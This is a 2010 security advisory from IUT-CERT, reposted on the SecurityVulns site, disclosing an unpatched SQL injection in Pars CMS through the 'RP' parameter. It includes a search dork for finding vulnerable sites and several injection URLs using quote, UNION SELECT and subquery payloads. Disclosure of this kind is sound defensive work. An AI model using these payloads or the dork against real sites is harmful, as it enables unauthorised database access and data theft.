Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Zigurrat CMS SQL Injection Vulnerability

  Ananta Gazelle SQL Injection Vulnerability

  [SECURITY] [DSA 2016-1] New drupal6 packages fix several vulnerabilities

  [XSS] I found a xss in phpmyadmin 3.3.0 when we create new database in interface!

From:faghani_(at)_nsec.ir <faghani_(at)_nsec.ir>
Date:15 марта 2010 г.
Subject:Pars CMS SQL Injection Vulnerability

================= IUT-CERT =================

Title: Pars CMS SQL Injection Vulnerability

Vendor: www.parscms.com

Dork: Design by Virtual Develop Co
Type: Input.Validation.Vulnerability (SQL Injection)

Fix: N/A

================== nsec.ir =================

Description:

------------------

Pars CMS is a CMS producer in Iran. "fa_default.asp" and "en_default.asp" pages in Pars
CMS

product are vulnerable to SQL Injection vulnerability.

Vulnerability Variant:

------------------
Injection "fa_default.asp","en_default.asp" in "RP" parameter.

http://www.example.com/fa_default.asp?RP='
http://www.example.com/fa_default.asp?RP=\'
http://www.example.com/fa_default.asp?RP=UNION SELECT 1,1,1 FROM validtblname%00
http://www.example.com/fa_default.asp?RP=' AND (SELECT TOP 1 'someData' FROM
validTableName)%00
http://www.example.com/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM
validTableName%00

Solution:

------------------

Input validation of Parameter "RP" should be corrected.

Credit:

------------------

Isfahan University of Technology - Computer Emergency Response Team

Thanks to : M. Fereidounian, M. R. Faghani, N. Fathi,E. Jafari

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород